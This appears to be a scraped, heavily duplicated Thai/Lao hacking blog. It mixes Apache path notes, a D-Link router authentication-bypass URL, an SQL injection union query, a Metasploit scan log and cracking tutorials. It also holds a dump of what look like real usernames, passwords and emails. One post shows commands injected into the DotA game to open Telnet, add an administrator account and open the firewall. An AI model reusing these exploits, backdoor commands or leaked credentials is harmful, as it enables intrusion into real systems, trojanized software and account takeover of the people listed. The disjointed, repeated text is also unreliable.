Default Apache config Path
Apache Logo |
ServerRoot :: /usr/local/apache2
DocumentRoot :: /usr/local/apache2/htdocs
Apache Config File :: /usr/local/apache2/conf/httpd.conf
Other Config Files :: /usr/local/apache2/conf/extra/
SSL Config File :: /usr/local/apache2/conf/extra/httpd-ssl.conf
ErrorLog :: /usr/local/apache2/logs/error_log
AccessLog :: /usr/local/apache2/logs/access_log
cgi-bin :: /usr/local/apache2/cgi-bin (enabled by default, but the bundled scripts are 644)
binaries (apachectl) :: /usr/local/apache2/bin
start/stop :: /usr/local/apache2/bin/apachectl (start|restart|graceful|graceful-stop|stop|configtest)
Apache httpd 2.0 default layout (apache.org source package):
ServerRoot :: /usr/local/apache2
DocumentRoot :: /usr/local/apache2/htdocs
Apache Config File :: /usr/local/apache2/conf/httpd.conf
SSL Config :: /usr/local/apache2/conf/ssl.conf
ErrorLog :: /usr/local/apache2/logs/error_log
AccessLog :: /usr/local/apache2/logs/access_log
cgi-bin :: /usr/local/apache2/cgi-bin (enabled by default, but the bundled scripts are 644)
binaries (apachectl) :: /usr/local/apache2/bin
start/stop :: /usr/local/apache2/bin/apachectl (start|stop|graceful|configtest)
Debian, Ubuntu (Apache httpd 2.x):
ServerRoot :: /etc/apache2
DocumentRoot :: /var/www
Apache Config Files :: /etc/apache2/apache2.conf
Loadkajai VIP User
[1] xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
[2] admin:xxxxxxxxxxxxxxxxxxxxxxxxxxxx
[3] keng:dvd123:keng-pattaya@hotmail.com:2
[4] donk_roman:0827694101:roman_2550@yahoo.com:2
[22] hellomaple:6460176:hellomaple@hotmail.com:2
[39] maleficent:phil009:madamlamenta@hotmail.com:2
[45] Poa2553:3552AOp:Dsnsombut@hotmail.com:2
.......
Twista Feat. Chris Brown - Make A Movie
Twista was one of the 100 rappers who they interviewed for the book- !HOW-T0. RAP| The Art&Science of the HipHop MC
My new page "Hacked Zone"
หลังจากที่ได้เห็น blog ของท่าน akira ผมก้อนืกในใจว่าอยากจะทำ page สำหลับเป็นหน้าที่เอาไว้บันทืก web ที่ผมได้เจาะไปแล้วใว้ในนั้น แต่ก้อยังไม่แน่ใจว่าจะดีไม งันผมขอ comment ใว้หน่อยว่าสมควนที่จะทำไม
ຫຼັງຈາກທີ່ໄດ້ເຫັນ blog ຂອງທ່ານ akira ຂ້ອຍກໍ່ນຶກໃນໃຈວ່າຢາກຈະເຮັດ page ສຳລັບເປັນຫນ້າທີ່ເອົາໃວ້ບັນທຶກ web ທີ່ຂ້ອຍໄດ້ເຈາະໄປແລ້ວໃວ້ໃນນັ້ນ ແຕ່ກໍ່ຍັງບໍ່ແນ່ໃຈ ສະນັ້ນເຮົາຂໍ comment ໃວ້ວ່າຈະສົມຄວນເຮັດດີບໍ່
How to Make Keygen - by Edkung [TH]
Requirement
● Ollydbg 1.10 & Plugin ApiBreak (or Other Ollydbg Plugin for Breakpoint Windows API)
● Plugin Code Ripper for copy assembly code from Ollydbg
● Teleport Pro v 1.29 (Build 1107)
● IDE Borland Delphi 7 (or other IDE)
● Read How to crack Teleport Pro
Download Ebook Here
Credit:Edkung
● Ollydbg 1.10 & Plugin ApiBreak (or Other Ollydbg Plugin for Breakpoint Windows API)
● Plugin Code Ripper for copy assembly code from Ollydbg
● Teleport Pro v 1.29 (Build 1107)
● IDE Borland Delphi 7 (or other IDE)
● Read How to crack Teleport Pro
Download Ebook Here
Credit:Edkung
D-Link Router Models Authentication Bypass Vulnerability
========================================================
D-Link Router Models Authentication Bypass Vulnerability
========================================================
# Exploit Title: Multiple D-Link Router Authentication Bypass Vulnerabilities
# Date: 12-01-2011
# Author: Craig Heffner, /dev/ttyS0
# Firmware Link: http://www.dlink.co.uk/
# Firmware Version(s): All
# Tested on: DIR-300, DIR-320, DIR-615 revD
Multiple D-Link routers that use a PHP based Web interface suffer from the same authentication bypass
vulnerability which allows unprivileged users to view and modify administrative router settings.
Further, even if remote administration is disabled this vulnerability can be exploited by a remote
attacker via a CSRF attack.
The vulnerability has been confirmed in the following routers:
DIR-615 revD
DIR-320
DIR-300
The following example URL will allow access to the router's main administrative Web page without authentication:
http://192.168.0.1/bsc_lan.php?NO_NEED_AUTH=1&AUTH_GROUP=0
For a more detailed description of the vulnerability, see: http://www.devttys0.com/wp-content/uploads/2010/12/dlink_php_vulnerability.pdf.
Note that this vulnerability was independently discovered in the DIR-300 and subsequently reported by Karol Celin on 09-Nov-2010 [1].
[1] http://www.securityfocus.com/archive/1/514687/30/120/threaded
D-Link Router Models Authentication Bypass Vulnerability
========================================================
# Exploit Title: Multiple D-Link Router Authentication Bypass Vulnerabilities
# Date: 12-01-2011
# Author: Craig Heffner, /dev/ttyS0
# Firmware Link: http://www.dlink.co.uk/
# Firmware Version(s): All
# Tested on: DIR-300, DIR-320, DIR-615 revD
Multiple D-Link routers that use a PHP based Web interface suffer from the same authentication bypass
vulnerability which allows unprivileged users to view and modify administrative router settings.
Further, even if remote administration is disabled this vulnerability can be exploited by a remote
attacker via a CSRF attack.
The vulnerability has been confirmed in the following routers:
DIR-615 revD
DIR-320
DIR-300
The following example URL will allow access to the router's main administrative Web page without authentication:
http://192.168.0.1/bsc_lan.php?NO_NEED_AUTH=1&AUTH_GROUP=0
For a more detailed description of the vulnerability, see: http://www.devttys0.com/wp-content/uploads/2010/12/dlink_php_vulnerability.pdf.
Note that this vulnerability was independently discovered in the DIR-300 and subsequently reported by Karol Celin on 09-Nov-2010 [1].
[1] http://www.securityfocus.com/archive/1/514687/30/120/threaded
Perl Scan Column SQL injection [ by Dreamclown]
สืกสามานานแล้ว แต่เพี่งมาเล่น perl ครั้งแลกก้อเลยลองเขืยน scan column ของ bug sql injection
ສຶກສາມາດົນແລ້ວ ແຕ່ຫາກໍ່ມາຫຼີ້ນ perl ຄັ້ງທຳອິດເລີຍລອງຂຽນ scan column ຂອງ bug sql injection #!usr/bin/perl
eBuddyWeb Messenger(0day) XSS Vulnerabilities [by Dreamclown]
# Exploit Title: eBuddyWeb Messenger(0day) XSS Vulnerabilities
# Google Dork: N/A
# Date: 30.11.2010
# Author: Dreamclown
# Software Link: N/A
# Version: N/A
# Tested on: Windows Xp Sp3
# CVE : N/A
# Google Dork: N/A
# Date: 30.11.2010
# Author: Dreamclown
# Software Link: N/A
# Version: N/A
# Tested on: Windows Xp Sp3
# CVE : N/A
เขืยน bot - Hack[SQL Injection] ด้วย VB [#1]
ก่อนานแล้วนะที่ผมเล่น SQL Injection ชื่งก่อ hack ใด้บ้างใม้ใด้บ้าง(crack md5 ใม้ใด้..อิอิ). อยู่วันหนื่งก่อใปรู้จัก hacker ท่านหนี่งที่ Thai Shadow [windows98se] แต่ใม้รู้ว่าเขารู้จักผมใม่นะ อิอิ...และก่อใปเห็น video ของท่านที่ใช้ในการเปีด course สอน เมื่อดูก่อเห็นว่ามี Code Perl ที่ใช้ในการหา Table,column,database ของเว็บที่มีบัด SQL ตอนนั้นอยากใด้มากกกกกก เลียลองเขียนเองดู ก่อเลียใช้ Google หา code perl มาศีกษา ผ่านใป 2 วัน
ก่อยังใม้ใด้ เลียคิดใด้ว่า vb ก่อน่าจะทำใด้เหมือนกัน ก้อเลียจัดการเขืยนในตอนนั้นเลีย. และเมีอเขียนใปใด้ 80% ก่อใปพบป้ญหาดังนี้
ตอนที่ใด้ html code กับมาใม้รู้ว่าจะหาค่า SQL query ที่แน่นอนในนั้นใด้ยังใง
การหาค่า SQL query ที่ติดมากับ html code นี้และผมว่าอยากสุด ก่อค่าที่ใด้มามันเปลื่ยนแปลงตามแต่ละเว็บ. แต่ก่อมีค่า query ที่เหมีอนกัน นั้นคือค่าที่ใด้มาจากคำสั่งนี้
ชื่งจะมีค่านี้ CHARACTER_SETS ใน html code
ผมเลียใด้ idea มาว่า:
ถ้าเราให้ bot นี้ request เอาหน้าเว็บนี้มาแล้ว search หาค่า CHARACTER_SETS ใน html code จาก
ก่อยังใม้ใด้ เลียคิดใด้ว่า vb ก่อน่าจะทำใด้เหมือนกัน ก้อเลียจัดการเขืยนในตอนนั้นเลีย. และเมีอเขียนใปใด้ 80% ก่อใปพบป้ญหาดังนี้
ตอนที่ใด้ html code กับมาใม้รู้ว่าจะหาค่า SQL query ที่แน่นอนในนั้นใด้ยังใง
การหาค่า SQL query ที่ติดมากับ html code นี้และผมว่าอยากสุด ก่อค่าที่ใด้มามันเปลื่ยนแปลงตามแต่ละเว็บ. แต่ก่อมีค่า query ที่เหมีอนกัน นั้นคือค่าที่ใด้มาจากคำสั่งนี้
hxxp://www.site.com/news.php?id=-1+union+all+select,1,2,3,table_name+from+information_schema.tables—
ชื่งจะมีค่านี้ CHARACTER_SETS ใน html code
ผมเลียใด้ idea มาว่า:
ถ้าเราให้ bot นี้ request เอาหน้าเว็บนี้มาแล้ว search หาค่า CHARACTER_SETS ใน html code จาก
XGoogle Bot v.0.1 Test [by Dreamclown]
-วันนี้เอา bot ที่ผมตั้งใจเขืยนมานานมา test ให้ดู ชื่ง bot นี้มันจะเอา search ตาม Google dork ที่ใส่แล้วก่อเอา Exploit มาต่อใส่เว็บที่หาได้ด้วย dork นั้นจากนั้นก่อ export ออกมาเป็น text file
-ວັນນີ້ເອົາ bot ທີ່ຂ້ອຍຕັ້ງໃຂຂຽນມາດົນແລ້ວມາ test ໃຫ້ເບີ່ງ ເຊີ່ງ bot ນີ້ມັນຈະຕື່ມ exploit ໃສ່ google dork ທີ່ຫາມາໃສ່ໃນໂປແກມ ຈາກນັ້ນກໍ່ save ອອກມາເປັນ text file
+Download Flash Video Here..!!!!
-ส่วนใครที่อยากได้ รอผมทำสมบูนแล้วจะเอามาปร่อย
-ສ່ວນໃຜທີ່ຢາກໃດ້ ຖ້າເຮົາເຮັດໃດ້ຈະເອົາມາແຈກ
Edit:Type Of Hash Password
MD5 : d41d8cd98f00b204e9800998ecf8427e => (32 char)
MD5x2 : 74be16979710d4c4e7c6647856088456 => (32 char)
MD5x3 : acf7ef943fdeb3cbfed8dd0d8f584731 => (32 char)
MD4 : 31d6cfe0d16ae931b73c59d7e0c089c0 => (32 char)
NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0 => (32 char)
LM : aad3b435b51404eeaad3b435b51404ee => (32 char)
SHA1 : da39a3ee5e6b4b0d3255bfef95601890afd80709 => (40 char)
SHA256 : e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 => (64 char)
SHA384 : 38b060a751ac96384cd9327eb1b1e36a21fd7bf63f6e1da274edad2b95b... = > (98 char)
SHA512 : cf83e1357eefb83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2bd47417a... => (128 char)
RIPEMD160: 9c1185a5c5e9fc54612808977ee8f548b2258d31 => (40 char)
Counter Strike Trainer Code[by Dreamclown]
[TH]
+เป็น autoit code ที่ผมเขืยนเองคับ แบบว่าเอา spider trainer มาดัดแปง
[LA]
+ເປັນ autoit code ທີ່ຂ້ອຍຂຽນເອງ ເອົາຂອງເຂົາມາດັດແປງ
;==============================================
Break(0)
#include <nmemory.au3>
$counter = "hl.exe"
$procid=ProcessExists($counter)
;Read more for download
+เป็น autoit code ที่ผมเขืยนเองคับ แบบว่าเอา spider trainer มาดัดแปง
[LA]
+ເປັນ autoit code ທີ່ຂ້ອຍຂຽນເອງ ເອົາຂອງເຂົາມາດັດແປງ
;==============================================
Break(0)
#include <nmemory.au3>
$counter = "hl.exe"
$procid=ProcessExists($counter)
;Read more for download
Metasploit - Grabbing Index Pages Of Webservers
msf auxiliary(http_index_grabber) > set RHOSTS carnal0wnage.com/24
RHOSTS => carnal0wnage.com/24
msf auxiliary(http_index_grabber) > run
[+] Received a HTTP 200...Logging to file: /home/cg/.msf3/logs/auxiliary/http_index_grabber/209.20.85.4_20100904.4426.html
[+] Received a HTTP 200...Logging to file: /home/cg/.msf3/logs/auxiliary/http_index_grabber/209.20.85.5_20100904.4429.html
[*] Received 301 to http://drumsti.cc/ for 209.20.85.10:80/
[-] Received 403 for 209.20.85.8:80/
[+] Received a HTTP 200...Logging to file: /home/cg/.msf3/logs/auxiliary/http_index_grabber/209.20.85.12_20100904.4432.html
...
[*] Received 302 to http://209.20.85.57/apache2-default/ for 209.20.85.57:80/ [+] Received a HTTP 200...Logging to file: /home/cg/.msf3/logs/auxiliary/http_index_grabber/209.20.85.56_20100904.4503.html
[*] Received 302 to http://209.20.85.51/session/new for 209.20.85.51:80/
RHOSTS => carnal0wnage.com/24
msf auxiliary(http_index_grabber) > run
[+] Received a HTTP 200...Logging to file: /home/cg/.msf3/logs/auxiliary/http_index_grabber/209.20.85.4_20100904.4426.html
[+] Received a HTTP 200...Logging to file: /home/cg/.msf3/logs/auxiliary/http_index_grabber/209.20.85.5_20100904.4429.html
[*] Received 301 to http://drumsti.cc/ for 209.20.85.10:80/
[-] Received 403 for 209.20.85.8:80/
[+] Received a HTTP 200...Logging to file: /home/cg/.msf3/logs/auxiliary/http_index_grabber/209.20.85.12_20100904.4432.html
...
[*] Received 302 to http://209.20.85.57/apache2-default/ for 209.20.85.57:80/ [+] Received a HTTP 200...Logging to file: /home/cg/.msf3/logs/auxiliary/http_index_grabber/209.20.85.56_20100904.4503.html
[*] Received 302 to http://209.20.85.51/session/new for 209.20.85.51:80/
[TH]
+ใช้หา่ file index ของ web servers ชื่งทำโดย Carnal0wnage
[LA]
+ໃຊ້ໃວ້ຫາ file index ຂອງ web servers ຊື່ງທຳໂດຍ Carnal0wnage
http://carnal0wnage.blogspot.com/2010/09/grabbing-index-pages-of-webservers.html
MySQL v.5 => Original Database & Table
[ 1 ] information_schema.COLUMNS
[ 2 ] information_schema.COLUMN_PRIVILEGES
[ 3 ] information_schema.KEY_COLUMN_USAGE
[ 4 ] information_schema.PROFILING
[ 5 ] information_schema.ROUTINES
[ 6 ] information_schema.SCHEMATA
[ 7 ] information_schema.SCHEMA_PRIVILEGES
[ 8 ] information_schema.STATISTICS
[ 9 ] information_schema.TABLES
[ 10 ] information_schema.TABLE_CONSTRAINTS
[ 11 ] information_schema.TABLE_PRIVILEGES
[ 12 ] information_schema.USER_PRIVILEGES
[ 13 ] information_schema.VIEWS
[ 2 ] information_schema.COLUMN_PRIVILEGES
[ 3 ] information_schema.KEY_COLUMN_USAGE
[ 4 ] information_schema.PROFILING
[ 5 ] information_schema.ROUTINES
[ 6 ] information_schema.SCHEMATA
[ 7 ] information_schema.SCHEMA_PRIVILEGES
[ 8 ] information_schema.STATISTICS
[ 9 ] information_schema.TABLES
[ 10 ] information_schema.TABLE_CONSTRAINTS
[ 11 ] information_schema.TABLE_PRIVILEGES
[ 12 ] information_schema.USER_PRIVILEGES
[ 13 ] information_schema.VIEWS
Viruses Killer Team LOGO - For Team Only
Hacking Telnet With DotA – [Static Code injection]
[TH]
ในนี้ผมใด้ทำ Video มาครับ เนื้อหาของ Video ก่อคือ: ผมจะทำ Static Code Injection เพื่อยัด Assembly Code ใส่เกม DotA แล้วเมื่อเปิดเกม Assembly Code ของเราก่อจะถูก run ชื่ง Assembly Code นี้จะทำสิ่งต่อใปนี้:
-เปิด Telnet เพื่อให้เรา connect เป็นหาคนที่เปิดเกม
-เพื่ม User ชื่อว่า user จากนั้นก่อทำ User นี้ให้อยู่ในระดับ Admin(เพื่อเวลาเรา telnet ใปหาจะใด้ใช้ User นี้เลีย)
-เปิด firewall traffic ให้สามารก telnet เข้าใปใด้
Assembly Code ที่ว่านั้นจะ run cmd command นี้:
sc start tlntsvr
net user user pass /add
net localgroup Administrators hacked /add
netsh firewall set allowedprogram %windir%\system32\tlntsvr.exe avast enable
+สิ่งที่ต้องมี :
- Olly Debugger
- Frozen Throne.exe(เกม DotA)
- CFF Explorer (เพื่อ Import Module function ใน DLL file เข้า DotA)
- API Viewer
Download Video Part 1 [HD]
Download Video Part 2 [HD]
Download OllyDBG
Download Static code injection.txt
Download API Viewer
Download CFF Explorer
ในนี้ผมใด้ทำ Video มาครับ เนื้อหาของ Video ก่อคือ: ผมจะทำ Static Code Injection เพื่อยัด Assembly Code ใส่เกม DotA แล้วเมื่อเปิดเกม Assembly Code ของเราก่อจะถูก run ชื่ง Assembly Code นี้จะทำสิ่งต่อใปนี้:
-เปิด Telnet เพื่อให้เรา connect เป็นหาคนที่เปิดเกม
-เพื่ม User ชื่อว่า user จากนั้นก่อทำ User นี้ให้อยู่ในระดับ Admin(เพื่อเวลาเรา telnet ใปหาจะใด้ใช้ User นี้เลีย)
-เปิด firewall traffic ให้สามารก telnet เข้าใปใด้
Assembly Code ที่ว่านั้นจะ run cmd command นี้:
sc start tlntsvr
net user user pass /add
net localgroup Administrators hacked /add
netsh firewall set allowedprogram %windir%\system32\tlntsvr.exe avast enable
+สิ่งที่ต้องมี :
- Olly Debugger
- Frozen Throne.exe(เกม DotA)
- CFF Explorer (เพื่อ Import Module function ใน DLL file เข้า DotA)
- API Viewer
Download Video Part 1 [HD]
Download Video Part 2 [HD]
Download OllyDBG
Download Static code injection.txt
Download API Viewer
Download CFF Explorer
สมัครสมาชิก:
บทความ (Atom)